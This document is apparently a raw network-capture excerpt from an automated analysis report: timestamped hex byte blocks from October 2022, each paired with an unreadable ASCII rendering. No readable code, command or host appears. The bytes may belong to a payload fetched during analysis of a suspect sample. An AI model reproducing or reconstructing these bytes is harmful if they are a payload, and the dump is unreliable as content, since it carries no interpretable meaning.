                                                                                                                2022-10-13 11:07:30 UTC18INData Raw: 8c 45 2f ba 6a ef 5d 1f 4b 95 aa 80 04 8c 6a a9 75 3b a6 6a 5b 21 22 bd 6a 73 d5 7d 7d 95 65 19 72 4a 95 e3 89 e5 5a 95 24 82 d2 a5 6a 48 20 b3 63 95 60 b2 30 44 95 4a fe ab 58 95 21 f9 47 a3 6a 54 6c 5c 64 95 4f 91 63 4e 95 99 dd 7a 55 95 59 f1 25 95 6a a9 dd 2a a2 6a 73 3d bd b2 6a ca 18 4c a9 21 9f 22 a4 26 0a 79 7d d8 0e da 3c 1f 9a 98 b5 11 c2 8b 2f fc 07 62 e3 7a 1a 0c f3 ab 7b 71 31 28 4b 2f ce f2 79 96 53 bd 02 95 36 38 7b 55 41 b7 ae 60 3a 2c ec 02 7f 0b e0 76 49 80 f5 be df 0e 12 e0 dc 9d 98 17 55 01 8c 2f 96 9b a1 e4 7a a8 48 30 ac 7b 69 c5 eb 4c 2f 12 26 ba 91 53 71 36 56 31 38 5b 80 67 74 d5 39 6a 7c 5c 4e e2 a6 28 77 05 1d af 8c 70 e2 51 95 ee 30 87 4e 95 a0 1c 1c 52 95 c9 13 f0 a9 6a 6a 36 eb 6e 95 9d 2b d4 44 95 89 ef cd 5f 95 31 8b 92 9f
                                                                                                                Data Ascii: E/j]Kju;j[!"js}}erJZ$jH c`0DJX!GjTl\dOcNzUY%j*js=jL!"&y}</bz{q1(K/yS68{UA`:,vIU/zH0{iL/&Sq6V18[gt9j|\N(wpQ0NRjj6n+D_1
                                                                                                                2022-10-13 11:07:30 UTC20INData Raw: 96 21 ba 50 b5 0b d3 b7 45 ee b3 d7 46 cf d9 ad 2a 4a 91 2f 5b 29 b9 06 6c ca 2a b9 5d df 10 da b6 a4 a7 9e 25 49 7d 1b 3b 2e b9 90 e1 9d d4 b7 d9 d1 81 d7 46 d2 ad ac dd 45 44 41 31 2f 48 a9 22 89 2b b9 ab fd 97 d6 b5 9d e3 61 d5 46 32 f8 f0 d6 46 89 8b 2a 26 49 f8 db bf 2c ba 8f 6d 0a f8 17 00 00 00 7b 54 e0 ff 98 5d 38 d2 04 15 c9 ec 21 65 c6 05 fd 13 1b 36 b6 e2 da 1f 8b a2 db f4 c2 06 52 08 60 d2 0e 8e eb 3c 05 63 7c 43 e2 a8 0c cc 04 25 4c bd 52 89 12 d5 33 f9 52 8e 04 ce c5 d4 10 e4 55 d4 db bb bb 52 a9 2a 42 39 fa 91 81 a7 ad 80 b0 95 dd 06 44 32 d4 fb fe 78 00 b8 de 7f 3f ec fa e7 16 00 00 80 6c 0e 26 00 81 56 4b 64 03 a5 a8 dc 7f bd ff f8 e7 16 00 00 80 5a 8b fa ff 74 3f 50 95 58 6e 95 df f5 2e 90 63 dc 06 f9 22 fd 27 09 10 54 35 03 01 2e 1b 8a
                                                                                                                Data Ascii: !PEF*J/[)l*]%I};.FEDA1/H"+aF2F*&I,m{T]8!e6R`<c|C%LR3RUR*B9D2x?l&VKdZt?PXn.c"'T5.
                                                                                                                2022-10-13 11:07:30 UTC21INData Raw: 92 02 80 05 56 f2 fe 7f cc e5 5e fb 7f 70 f1 09 02 80 6d 65 5c 06 80 d4 f9 2d fa 7f 53 29 34 03 80 91 53 bf 03 80 c4 7f 9b ff 7f db 00 68 f2 7f f9 d7 07 01 80 43 44 b1 ff 7f 68 36 09 b5 1d e8 3e bf 2a 00 0b ff 58 5e 3e dd 24 a9 17 8a d7 0f 85 97 58 00 00 66 83 78 02 65 0f 85 8c 58 00 00 66 83 78 04 56 0f 85 81 58 00 00 66 83 78 06 65 e9 fb 51 00 00 3b e0 89 95 a0 45 d4 2e 48 a5 2e 6c 2a b9 a7 f1 72 d7 b5 79 c7 84 d4 46 e6 8c 15 d7 46 c5 27 cf 27 49 c4 e7 41 d8 b6 cd 0b e4 d3 46 58 c9 42 29 48 99 11 5e 2a b9 1a 65 73 20 ba 8c 89 ee d2 b7 a1 aa 56 d6 46 93 a5 48 2b 4a cd b3 be 28 b9 fa 10 2f 2b b9 11 f3 f5 db b6 00 03 7b 24 49 31 97 b2 23 bb ca 61 04 f8 17 00 00 00 bb de 2e 00 3d 61 92 dd f9 e4 77 b4 d8 7f 57 e0 fc e7 16 00 00 80 58 12 da ff c6 e9 fa 9a c2
                                                                                                                Data Ascii: V^pme\-S)4ShCDh6>*X^>$XfxeXfxVXfxeQ;E.H.l*ryFF''IAFXB)H^*es VFH+J(/+{$I1#a.=awWX
                                                                                                                2022-10-13 11:07:30 UTC22INData Raw: 05 51 fb 6b 0b 6d 37 30 5f 05 9e e7 6d 5e 47 db 1d ab 23 68 70 a2 f0 a3 ef cb 62 3e 83 d0 63 18 1f aa 5d 31 54 f5 41 31 4b 18 66 12 e8 52 3a 72 9a f5 03 a5 1a 18 63 be 61 4d fe df 6b 62 c6 6a 71 93 f0 6d 5b e3 d6 0a ab 1e e4 7d b5 f0 1f 73 c6 75 3e 0f fc 6e 0f 1f 0f e9 3c 43 f5 25 f5 46 0f 66 5e 74 5f 2d 72 47 9f 3e 80 72 be ff 56 20 fc 7e f5 45 f4 fe ff ff ff a8 eb 57 cd e3 02 ae 32 44 ef e2 44 35 c4 90 38 23 a5 b2 3c 1e 5c 59 4d e4 48 2c a8 b2 50 61 5e cf 3b 37 fb 65 ce bb 41 3e 01 58 4d cf d0 86 37 44 07 91 f1 a8 32 e6 ec 10 55 cd 2f 2e 2b 33 44 f3 d6 c1 34 c4 84 7c a6 a4 b2 68 c2 d9 58 4d d8 24 a9 a9 b2 3c 1d db ce 3b bb af e0 cf bb 15 fd af f0 26 d8 4f 6e c2 e3 49 02 b1 b2 25 65 d7 b2 39 a9 03 2f 20 92 79 a1 6a da 54 2c 36 c1 65 0f 1c 11 7a a5 c1 f4
                                                                                                                Data Ascii: Qkm70_m^G#hpb>c]1TA1KfR:rcaMkbjqm[}su>n<C%Ff^t_-rG>rV ~EW2DD58#<\YMH,Pa^;7eA>XM7D2U/.+3D4|hXM$<;&OnI%e9/ yjT,6ez
                                                                                                                2022-10-13 11:07:30 UTC24INData Raw: df 3e dc 6e 93 c6 91 4e 7a 96 52 d1 7d 8f 50 39 22 9d 74 12 92 7a 33 51 fa 06 86 39 da ac 34 ff 27 e5 ca b6 97 be 2f 28 81 88 74 fe 27 e5 ca 5e 6b f5 df 3a e6 e3 57 4c e8 01 e9 6e 80 b4 13 b2 6e ad 6b c3 df 6e a6 8a 3c 40 e3 ed ef 49 04 91 88 89 58 96 67 90 bc 13 c7 6e b4 16 ea 5c d7 5d 85 26 3c 91 e6 40 37 2a 69 27 d9 fe 06 d0 68 96 40 b0 74 e2 63 4c 9e 7a 78 19 6b e0 68 60 31 36 a7 1c 3e ea 40 0e b7 24 cb 9d 00 cb 76 1f 42 7c c9 5e fe 16 bc 56 a2 f1 85 93 1e 1c d7 bc f4 43 6d cb 9c 1e d0 00 9c 22 a8 74 e4 b9 2e 86 7a cc 8b 09 f8 68 e6 93 54 bf 1c 96 50 22 16 b7 8e 31 ff 18 cb f8 15 20 64 c9 3e cc 78 ac 38 00 e5 74 41 3f d6 32 af 12 81 a3 c0 33 78 0e cd ca 56 2e b8 b8 9b ea a6 db f9 d3 92 4d c7 da 12 c8 29 7c b1 59 2b 0c f7 2b 51 f1 44 5a 4b 9e c0 0e 1e
                                                                                                                Data Ascii: >nNzR}P9"tz3Q94'/(t'^k:WLnnkn<@IXgn\]&<@7*i'h@tcLzxkh`16>@$vB|^VCm"t.zhTP"1 d>x8tA?23xV.M)|Y++QDZK
                                                                                                                2022-10-13 11:07:30 UTC25INData Raw: 3b d0 17 70 79 69 8f f8 00 00 00 40 1b 26 08 cd 4d 06 71 21 6a 08 18 02 ae 8d e9 ee ef 8f 87 2a 73 07 ff ff ff bf e8 2c 6b ea fe 35 cc 61 be 5f cc c0 08 99 39 fd 4b a2 00 de bb 2e 35 45 7e a5 85 18 94 07 35 00 c3 f3 dc ca bd 50 93 b0 ea da 3d 27 3b fd b3 38 b3 3d 18 b7 31 b5 b6 31 48 85 9c db ef 23 00 a3 15 f4 52 34 e5 77 e9 89 95 42 4c 51 bf 1b 7d a6 6a 5e 6c df f4 2a 35 ba 1c d0 75 92 b0 22 a8 15 72 8e ff 30 bb f5 b7 56 ea 7b ad 1b a8 d5 3c 0e f4 6a 79 9d 60 e5 6a f0 b7 e8 38 6a 81 3f 7d b6 d5 6d b4 9c 6a 00 db d4 9d 6a fe 5b 70 ff 52 a4 a2 60 f3 f4 48 f6 d2 ff 99 1d 09 ad 8d 82 a4 7d ea 50 68 1d ec 44 e5 53 1d 6a f7 72 e5 e9 44 0d b6 1b 95 10 b6 69 be 95 8b fa 09 ee 95 88 51 1e 1d bb 34 45 c6 4a e3 af f9 c2 89 45 60 22 00 65 76 f8 52 4e bf 68 b0 3d e8
                                                                                                                Data Ascii: ;pyi@&Mq!j*s,k5a_9K.5E~5P=';8=11H#R4wBLQ}j^l*5u"r0V{<jy`j8j?}mjj[pR`H}PhDSjrDiQ4EJE`"evRNh=
                                                                                                                2022-10-13 11:07:30 UTC26INData Raw: 17 ac 1e a7 b6 cb 25 14 81 f9 13 90 7f d7 99 45 54 d3 02 e0 28 59 87 5a e5 df c7 5f 59 8b 56 9e 5d 05 48 82 d5 00 1e 4d e5 a5 9b de cb ed 07 da c3 c7 5f a1 46 ea 04 46 fb ee 7f 2d 35 ed fa 04 41 96 d9 80 77 e4 b3 79 72 4a 9e 2d 59 cf 62 9b da c7 67 39 f5 53 9e 3c 85 36 87 d5 80 f6 33 e0 a5 73 16 b5 e8 07 13 d3 b9 5a a1 56 f2 7a 43 fb f7 d9 13 50 7a c8 fa 00 26 ac c4 37 d9 bd 81 7d 88 4b 54 f9 34 1d a9 9d 46 9d c5 a4 b4 de f0 e2 2b 77 4b 60 3a c6 94 45 99 c5 72 32 bf c7 e2 79 a9 b1 7a 3a ca 62 39 0c 1d 1d 27 f7 3a 1d 71 65 3b 87 c5 30 88 ba f5 e2 3b c1 14 c9 e2 ad 29 62 6d 3a 10 40 fa 00 1d df 5b 6f 90 c5 ea 98 61 69 3a 7e 56 9b 37 1d 1d 2d 95 8a c5 4e be 1d fc e2 c1 5f 77 b2 e0 61 e1 2a fc 65 42 0e 8b d9 c7 e1 ab ae 79 e4 8c d1 30 59 09 e4 d4 c7 c7 e1 97
                                                                                                                Data Ascii: %ET(YZ_YV]HM_FF-5AwyrJ-Ybg9S<63sZVzCPz&7}KT4F+wK`:Er2yz:b9':qe;0;)bm:@[oai:~V7-N_wa*eBy0Y
                                                                                                                2022-10-13 11:07:30 UTC28INData Raw: 69 78 ce da 83 92 d9 d3 d7 10 85 83 51 b7 eb c1 df 3b 91 64 d5 16 a8 fa 0d 9f 6c 45 3c 32 a1 b5 5b 36 fd 6e b7 be 2c 80 c4 50 a0 1e 91 ee 81 31 94 0a d3 58 22 80 ad f7 c9 25 91 dd 67 79 37 91 aa 6f a3 0d bc d5 73 83 e7 2f d4 94 3d 51 8b f8 c1 31 7f 85 b8 c3 16 01 97 d2 0b 4b 46 e3 0c f0 3d ef 48 24 a9 e0 e1 34 60 8d 3f 9d 36 ba 44 6b 5d a9 1a 73 f8 72 e1 98 5d c1 15 bc 9b 91 e1 ff 2f 2e 16 5f 49 8b 1c eb 53 67 85 ea 09 74 19 97 00 61 29 5e e3 76 da 5f f7 48 14 fb 82 f9 34 42 1f df d8 32 0f 78 c3 2f ce 32 55 06 d1 bb db 9d ca 2e 8c 6e 1b 35 d1 02 4a 09 c6 2e 2f a1 ac cf 2e 8d 8b 0f 33 d1 6d 63 45 c7 2e 31 b1 d3 d8 2e 50 34 e2 e1 2e f9 bb 94 2f d1 99 89 28 04 d1 58 2c 10 f1 2e f9 6d d8 3d d1 36 30 5e c2 2e 18 8c 4c 31 d1 f1 37 e9 38 d1 1f 25 4a c4 2e 8b 5d
                                                                                                                Data Ascii: ixQ;dlE<2[6n,P1X"%gy7os/=Q1KF=H$4`?6Dk]sr]/._ISgta)^v_H4B2x/2U.n5J./.3mcE.1.P4./(X,.m=60^.L178%J.]
                                                                                                                2022-10-13 11:07:30 UTC29INData Raw: 15 e6 62 23 45 55 e6 cf d6 bf c9 5f f3 03 df 05 23 da a0 26 d8 c1 60 d3 25 60 e6 05 c4 d8 b8 11 db 46 91 b0 e6 74 36 40 c2 8b 64 d8 4e a9 5f 43 f6 b5 12 0b 56 67 8e 22 ab de f9 b7 6d 04 b3 0d fa 85 03 97 f2 20 49 6f be 51 d9 0c 05 04 22 da b4 32 61 35 27 d4 4d bf b7 6e ac fa 10 c7 bf 36 4f 00 29 b1 35 33 a7 34 06 26 10 6f 14 39 18 59 ef b1 b7 ba db 83 35 11 6f 9e fc e2 bd 52 55 a3 54 9d 52 55 c3 75 2e 57 b5 f4 28 23 a8 8a bc 93 31 af 2a be 2a 81 43 55 69 5e 0d b6 aa ae f3 09 b3 6a 2e 17 54 b6 2a d5 23 2a 4a 15 d9 29 0a 43 75 0e 38 14 bc aa b9 be 34 bc aa 2e df 87 b9 4a 78 0a 8a 46 75 de a1 98 41 d5 aa 90 28 ad aa 93 f4 a4 58 55 25 91 a0 5d 95 cd a9 79 58 b5 00 00 00 01 00 00 00 e3 45 bb 99 4a 33 4c 57 0b c6 18 31 97 f4 e2 de e8 59 0b 69 82 1d 48 0b 9e 11
                                                                                                                Data Ascii: b#EU_#&`%`Ft6@dN_CVg"m IoQ"2a5'Mn6O)534&o9Y5oRUTRUu.W(#1**CUi^j.T*#*J)Cu84.JxFuA(XU%]yXEJ3LW1YiH
                                                                                                                2022-10-13 11:07:30 UTC30INData Raw: 14 da 67 d8 ed 19 26 88 e0 e3 cc fe c3 f0 2c 00 8a eb ff d9 4f 14 5f b0 2a 81 ca 4b 97 7b 83 f4 a7 b1 5e 74 2d 00 04 3d af 8c c8 16 08 26 5f 54 28 e8 25 b2 30 a3 c7 ff 54 e1 d1 ff 93 f9 e1 d9 f3 68 8c 45 d5 23 62 af 20 e8 d3 0f b2 b1 3e ac d4 ff 04 3d af 8c fc c5 a4 6f 6d 1d 08 aa b6 cc a1 32 86 ff d2 4c 27 00 9b 57 ea d9 5c 17 b9 b7 2a b6 9d fa 31 d8 ea 00 a7 2a a0 b2 e2 a7 2a 09 08 a9 eb 5c 26 19 55 d5 37 8b 69 4e ba 74 a8 7d 4e 8e c8 db ff 04 3d af 8c 4d 0a ce 0f 12 8c 3c cb 27 a3 c8 b8 2a d1 f3 0c f2 81 f6 0a 69 81 4c 5c 96 3e 81 1e b0 d5 8d 7e 8e 7c d3 a2 2a e3 c4 e2 3d d8 85 01 4a 81 f3 81 f5 57 d5 04 33 96 c1 27 fd 69 64 81 2b 87 d8 04 81 b5 87 d3 53 d5 bf e8 b4 7a 4e 67 af f4 97 05 1d af 8c b8 f5 4a 95 0f dd fd 59 95 3b 29 e4 42 95 29 f5 bb 82 6a
                                                                                                                Data Ascii: g&,O_*K{^t-=&_T(%0ThE#b >=om2L'W\*1**\&U7iNt}N=M<'*iL\>~|*=JW3'id+SzNgJY;)B)j
                                                                                                                2022-10-13 11:07:30 UTC32INData Raw: d1 6f 09 ed 10 f3 9a 12 db 3e 48 c9 19 a7 b4 f9 e6 25 c9 b0 ba 27 5b 4b 6a 4b d6 3e b8 17 88 a9 b4 e5 94 d1 b7 22 83 22 00 ae c7 d6 a9 81 92 30 ab b4 29 fa 56 bc 0c e6 5b b8 e6 64 d8 a3 b4 35 97 b3 af ea 09 d1 6f 48 da 14 f3 37 3d 16 4e 0b 07 c0 7e 98 71 6d fe 1c 23 9e d7 f1 47 10 eb 09 d1 6f 20 bf eb cc 6b 22 29 b7 b4 d9 04 d5 ff 6f 30 d4 bf 02 d4 d1 ff ea 8b 2d c0 c7 82 c1 68 6d 8c 8a 28 ab b4 53 af 9c 63 ce 96 55 23 5a 0e 11 0c f3 58 4b 28 6f ab 0c 8b c8 b6 32 eb bd 76 97 a6 a0 51 b8 98 ea 49 10 eb 09 d1 6f eb 1e e4 8c eb c6 b5 40 1c 10 af 5f 4b 38 09 de ff bc 88 38 00 97 59 8c 8e 9a 35 ab 66 09 65 cb 1c 8a 0a a1 34 c9 b2 b4 ee 78 a1 fe 9a 87 ac 47 7a 65 9a b1 8e 8a e1 c2 fd ac b4 d0 db 83 8a 33 ff bf 5f 4b d5 26 e3 09 65 81 80 46 82 99 c8 ff 59 a0 85
                                                                                                                Data Ascii: o>H%'[KjK>""0)V[d5oH7=N~qm#Go k")o0-hm(ScU#ZXK(o2vQIo@_K88Y5fe4xGze3_K&eFY
                                                                                                                2022-10-13 11:07:30 UTC33INData Raw: aa f2 c5 60 e1 45 90 79 80 cc fb 7a b7 cb db d5 23 db ae 56 ab 3f 9b 5e e3 17 04 43 78 3d 81 41 e9 50 fa 78 41 8d 7a 3f 8d 1b 2a 98 f4 d1 fb ac 6c 20 c4 d5 c0 13 d9 b2 f4 93 77 34 49 28 72 95 b2 f2 7c 68 f8 db d5 27 cb b2 f2 dd 31 07 55 90 0b 20 ce cc b0 81 4a 70 e0 3a 0d ee a4 0d f0 87 8f 39 2a ab 99 3f 48 10 9a 68 66 3b a1 5d d8 79 41 c5 02 89 3e d9 95 50 92 1a d8 c7 76 9d 50 8d b8 b2 9b b1 ef c2 bc 7f 7d d5 20 9f a8 f2 27 b6 18 b6 6f a4 d7 7e 58 b3 26 da 8e 3a be 66 b9 c1 7b a3 a3 06 f0 6b ed 26 49 0b fe ff ff ff 07 15 39 44 aa 86 c6 ab b2 9e af b4 cc 3b 09 1d 8f cd bb 57 e0 eb 5b 4d 21 36 6c 34 44 d1 cf 1b ab 32 b8 72 fa 56 cd a1 18 c1 30 44 f5 d8 2b 37 c4 ca 12 4c a7 b2 06 6c 33 5b 4d 66 02 43 aa b2 2a 43 31 cd 3b e5 b1 0a cc bb 0b 64 6e 5a 4d 85 82
                                                                                                                Data Ascii: `Eyz#V?^Cx=APxAz?*l w4I(r|h'1U Jp:9*?Hhf;]yA>PvP} 'o~X&:f{k&I9D;W[M!6l4D2rV0D+7Ll3[MfC*C1;dnZM
                                                                                                                2022-10-13 11:07:30 UTC34INData Raw: 4a 40 69 9a 7e 2b 70 40 e2 57 55 87 d2 53 b4 c1 b8 80 93 5a 1c db 3d 55 32 6f 9a 75 2d 71 4b 63 ff d5 39 49 9d 93 55 37 2c 81 99 55 6e eb f8 dd f2 10 f2 bf aa 82 80 99 e3 f0 0e 5d f2 cf 8c 6c 68 47 fe ff ff af 7e a8 81 55 34 df 4b 85 f5 65 36 38 73 63 d3 a2 1a 6b d6 e1 87 5e aa 27 99 c5 4b 0a f1 71 98 bf 47 8f ec 3c 7b 2e e8 d5 25 e3 b0 ba f5 37 b2 3a 30 0b 6c 9d b8 fe ff ff af f6 e7 b4 a8 b6 2b e4 0e 6d fe 2f 1c d0 b2 c5 97 2b 40 2a 6e fb 92 cf 03 84 65 2a 19 9c 43 b7 95 da 0c b1 fd 4e c7 ba 4e 3a 7c 97 d5 c0 7b 3a 02 49 7b 5b 12 2a f5 4b 0c e1 04 25 08 ba 2a 78 86 85 ce c9 a6 e6 ec 41 f3 9f 8b 93 b6 2f b0 3a f8 12 a8 c0 73 f4 86 2a ea d2 bf 84 b3 04 6d a2 d4 54 5f f6 3e f1 da bf 9d 16 f3 d5 53 90 1c c2 cf c8 9d 60 47 fe ff ff ff 15 1d 38 2a 8f eb 6c 7e
                                                                                                                Data Ascii: J@i~+p@WUSZ=U2ou-qKc9IU7,Un]lhG~U4Ke68sck^'KqG<{.%7:0l+m/+@*ne*CNN:|{:I{[*K%*xA/:s*mT_>S`G8*l~
                                                                                                                2022-10-13 11:07:30 UTC36INData Raw: 6d c6 cd 4e 76 4d 22 38 14 85 32 7d 33 25 7e 4d 59 30 5c 89 f2 54 66 d6 89 f2 29 e5 2a 7a ed 74 2b 04 d6 ba 1b b8 26 fa ef b9 11 09 f5 dd dd 6b 45 66 97 fc 72 67 72 7f f1 23 f8 1a 24 6f 9e 3c 4d c3 03 4b 3f c6 fe 35 b3 ad 6d 0e 57 f6 57 ab 9b 00 5d e8 f0 93 af e6 28 3e 9b b8 4e 52 1f ca 2d 1c 1e f5 11 21 66 52 66 3b 30 7f 70 72 d3 9d 2e ef 1a c9 83 93 2b 4d 8f 8f 46 28 c6 12 19 be ba 6d 0b 83 fb 40 ab 2f 8a 8d 50 04 bf 66 a8 5f 04 8b bc 0b 7b a0 be 2e d3 cd 72 c4 fd dd 1a 33 c1 86 73 41 84 ae 8b 8f 4a e4 bf 9c 36 bf 7b 68 87 9d c3 bf 9b 1b bb d2 72 b2 e0 4c 5d 6c 61 a1 94 33 df 1b 3c 0b fe ff ff ff c1 9f db fb a3 24 bc 4b ff ff ff ff bd a9 5b 51 8c 29 84 4f e9 1b 30 9c 4d 1c ba 6a a6 87 d5 aa 43 d1 88 0b 96 8b c5 eb 92 36 2f 84 7c e8 43 2e 04 52 f4 3e c6
                                                                                                                Data Ascii: mNvM"82}3%~MY0\Tf)*zt+&kEfrgr#$o<MK?5mWW](>NR-!fRf;0pr.+MF(m@/Pf_{.r3sAJ6{hrL]la3<$K[Q)O0MjC6/|C.R>
                                                                                                                2022-10-13 11:07:30 UTC37INData Raw: 3a 6a be b2 ad 19 1d c5 59 e0 e5 bf cb 1a 4a 3a be c8 33 ca bf 95 3a 09 4a 11 65 be dc 87 61 5d c9 c9 13 e9 4e c2 fd 80 53 d9 bf a9 c3 9a 85 b8 5a 36 d8 a2 0c df 3d a0 21 8d 15 e0 53 e1 71 c1 ff ff ff ff ff b1 de e6 85 bc 18 56 ee f2 cb f7 f1 a2 87 c8 61 c4 c8 67 9a 07 ac 66 84 2d 00 00 00 00 81 2f 4f 67 f6 aa 5a e3 a6 f2 30 16 fc fd 45 6d b2 cf 84 07 5d 60 e7 c1 14 c4 be 78 f0 a2 69 bc 3b 93 c2 20 83 2c 16 19 c0 81 2f e5 f9 30 c2 c6 a2 a6 e8 93 8a c2 0b a1 81 12 32 dc 5c b6 6d e5 0e 3a 33 5d 09 f8 87 0c ac 22 32 2c 42 81 02 5e 13 74 14 63 3a b8 60 b2 3f 1d 2b bb bc 82 c5 d8 18 34 f4 e2 67 5d fa c2 e2 0b f7 36 7f 3a a2 2a b7 0d 1d 99 7b 19 31 1d 17 b3 6f 95 c5 8a 42 f7 f8 e2 dd f1 62 68 3a 40 12 6c 91 c5 f4 ec 96 cf e2 a7 67 98 72 3a 04 dc 10 04 1d a3 81
                                                                                                                Data Ascii: :jYJ:3:Jea]NSZ6=!SqVagf-/OgZ0Em]`xi; ,/02\m:3]"2,B^tc:`?+4g]6:*{1oBbh:@lgr:
                                                                                                                2022-10-13 11:07:30 UTC38INData Raw: 32 18 4a 7f 0d a3 44 42 78 4d 07 7f 79 82 52 f3 6b dc 7c 0d 36 93 c2 7e 6d 11 1a f5 7d 4d 96 57 af 8e 32 16 54 9e 75 4d 32 5f e7 82 f2 40 b1 6d 82 f2 ce 12 91 71 ed c8 fa 51 8a f2 9a 9e 59 8d b2 91 dd 62 77 ad 2d 99 90 d3 ba 12 e2 79 66 2f c7 12 8f 0b 8a b9 f7 24 09 91 d9 18 b3 7f 70 8a b2 d8 5e 54 d9 6a 0b cc a3 63 47 0b 87 53 d8 bb f4 26 cf 64 b4 f4 f2 aa 68 42 0b 25 8c 6a 5c 0b 87 02 4f 4b 0b bf b9 32 8b f4 5b 4f eb 45 0b d0 43 1e 54 0b 33 08 5a 59 0b 94 1a cf 9a f4 92 cd 75 b7 f4 75 05 ce 4b 0b 14 51 72 44 0b 70 0c 7e b2 f4 a7 62 7c ac f4 09 2c 59 bb f4 d9 c1 05 49 0b d3 2e f8 10 eb 09 d1 6f 6c f5 a6 4c a9 d4 c5 e6 b4 54 11 a3 13 e9 d1 94 b2 d7 fb 3a f9 6c 93 c6 c4 07 85 60 c3 8c c9 e1 c3 b0 f0 33 73 56 1a 72 37 79 7d 8e 0f cc 63 a8 84 04 c7 e0 4c 6c
                                                                                                                Data Ascii: 2JDBxMyRk|6~m}MW2TuM2_@mqQYbw-yf/$p^TjcGS&dhB%j\OK2[OECT3ZYuuKQrDp~b|,YI.olLT:l`3sVr7y}cLl
                                                                                                                2022-10-13 11:07:30 UTC40INData Raw: 71 3c ca 08 b0 c5 31 4b 83 8c 08 22 eb fd 44 d1 8a ee e5 05 45 a7 0f a1 c7 bf 38 8e 23 f5 75 fc 4e 97 dc c0 cf 6e 40 4f df 37 2a 91 52 af 34 30 2f a0 91 b8 fe ff ff ff fb 01 55 aa b5 68 78 e7 d5 76 d1 39 bb 55 b7 bd 4e 3a 2a cf f6 05 54 aa 2c 5d 53 fb d5 63 2c 22 a2 55 d2 b4 3c 76 2a 62 1c 38 f6 d5 fa ca 35 9d 55 f0 d7 29 97 55 11 a5 c5 4f 55 63 ca 29 00 2a 0c e3 68 5c aa fd df 1f dd d5 e9 ec 54 b3 55 56 07 02 1c 2a c5 de 73 45 aa 94 9e 6d 91 d5 14 3d 27 78 c3 c7 e9 d0 9d 98 79 4c 3c 85 6e 7a dd 74 84 19 5f 06 94 d0 d4 0c 57 49 ac 19 b4 bb e9 c7 c7 eb 6f 68 51 96 24 02 33 fd 25 45 ce a9 b6 ba 2b 90 00 f1 c0 ce f2 42 67 6f c3 2f 53 d0 18 ed 8f 3b 85 ca 2e 1e 73 84 1b b3 c5 93 d0 70 40 94 4e ac 1d 96 fd ad b1 22 49 59 57 05 1d af 8c e9 db e1 f1 32 0d eb 88
                                                                                                                Data Ascii: q<1K"DE8#uNn@O7*R40/Uhxv9UN:*T,]Sc,"U<v*b85U)UOUc)*h\TUV*sEm='xyL<nzt_WIohQ$3%E+Bgo/S;.sp@N"IYW2
                                                                                                                2022-10-13 11:07:30 UTC41INData Raw: 7f ff 60 57 96 7f b5 67 38 65 80 cf fe 90 69 80 5d 58 f0 95 7f c8 d3 5c 90 7f 7a 17 0b 69 80 ab 03 5e 6d 80 84 37 2f 91 7f 89 97 36 68 80 23 dd bd 68 80 48 09 99 94 7f ab 7e 6a 99 7f a7 01 bd 64 80 a8 b1 89 95 9b be 85 2e 48 66 cd 3d 2a b9 ec fa 23 d7 b5 8a d4 d5 d4 46 d5 bf 44 d7 46 8e 0c 9e 27 49 6f 4c 10 d8 b6 0e 88 b5 d3 46 73 e2 13 29 48 fa f2 0f 2a b9 f1 8e 22 20 ba 6f 6a bf d2 b7 ea a1 07 d6 46 e8 be 19 2b 4a a6 78 ef 28 b9 c1 cb 7e 2b b9 32 30 a4 db b6 63 60 2a 24 49 6a d8 a8 d8 ba c0 27 25 f8 17 00 00 80 32 6a 4f 00 7d 55 40 91 f4 ce 1b eb 9e 7f b6 b5 8b 62 80 01 ae 27 67 80 37 aa 70 9e 7f 00 f6 25 9a 7f 57 2a 54 66 80 ba 02 4d 9f 7f be 68 c6 9f 7f d7 24 e2 63 80 88 7b 11 6e 80 b6 1c 7e 9d 7f b2 ad d6 91 7f 28 e3 b6 6d 80 41 b0 1a 68 80 13 6c 4d
                                                                                                                Data Ascii: `Wg8ei]X\zi^m7/6h#hH~jd.Hf=*#FDF'IoLFs)H*" ojF+Jx(~+20c`*$Ij'%2jO}U@b'g7p%W*TfMh$c{n~(mAhlM
                                                                                                                2022-10-13 11:07:30 UTC42INData Raw: ab 2e 61 9f 66 41 d1 22 e2 8a 54 d1 cc 88 53 3f fc ff ff ff 4d 0a 00 1f b0 98 d5 1e 91 af b3 45 9c ff 0e a0 0e 65 00 45 93 e5 9e ff 62 b3 3a 94 ff 7c 18 b8 93 ff bd 8e 75 7e 00 2d 2a 87 75 00 fd 7d 09 89 ff b8 36 c8 77 00 83 c5 fa 7d 00 c4 9a 51 7d 00 47 d7 2a 85 ff 7e fc 61 7c 00 01 ff 8a 87 ff 3e 7f 55 8d ff 88 a4 d7 8a ff 7d da 1a 67 00 29 de e8 6c 00 69 49 66 90 ff 80 b7 fa 96 ff ff 29 6c 00 77 6a 98 a9 2e 7b ce 3f ae d1 1d a1 f1 a8 2e 21 8f 75 a5 2e 3e 47 9d a7 2e 7b fd 66 8e 2e 6e 15 9e 50 2e 09 3a f6 55 d1 33 5b be bf 2e e7 f0 f4 ad 2e c9 6a 54 4d 2e 7b 56 39 54 d1 19 7a 9e 53 2e 68 e5 50 55 d1 fa 63 d4 58 d1 93 7b 3c 5a d1 99 49 c7 73 d1 e5 e1 3f ad d1 9d 7e ce ab 2e 89 f0 41 3f fc ff ff ff 87 5f 3d 61 98 ce e8 e4 6e a6 cc bf 69 00 69 2b 14 69 00
                                                                                                                Data Ascii: .afA"TS?MEeEb:|u~-*u}6w}Q}G*~a|>U}g)liIf)lwj.{?.!u.>G.{f.nP.:U3[..jTM.{V9TzS.hPUcX{<ZIs?~.A?_=anii+i
                                                                                                                2022-10-13 11:07:30 UTC44INData Raw: 69 1c 94 5d a1 87 f2 2b 08 ae c8 c8 33 e1 07 b5 40 d1 2e ef b9 a9 20 52 c8 9a 10 29 37 75 23 ec 8c 4b ab 2c c8 fd 14 2e 6c 22 62 39 d1 fb 00 6a 8b fe 47 45 b1 42 c7 cb f9 a5 2f 55 47 9b 86 fa c9 6a 8c 46 c0 ee 6e 41 81 07 a8 52 75 8a 6c 43 70 2f 21 07 6d e9 cd 6e 9c 19 36 80 e8 a4 d2 cf 96 58 98 4a ba 23 92 ba 2f 80 dc d8 01 3f 91 bd 67 63 33 91 36 6b b3 73 85 1a 49 94 0d 97 3c 31 c9 4a e3 38 e2 bf e3 48 2a 2b 62 ed 34 e2 0f bd 91 36 3e 2e e9 51 a9 00 d9 7a 7e e1 58 4f 43 19 bc f3 7b 63 f3 2f bc 1c dd 45 8b 12 f1 d1 6b 85 fe 3b f6 15 97 32 53 ab 52 e3 56 90 dd fb 48 50 b9 00 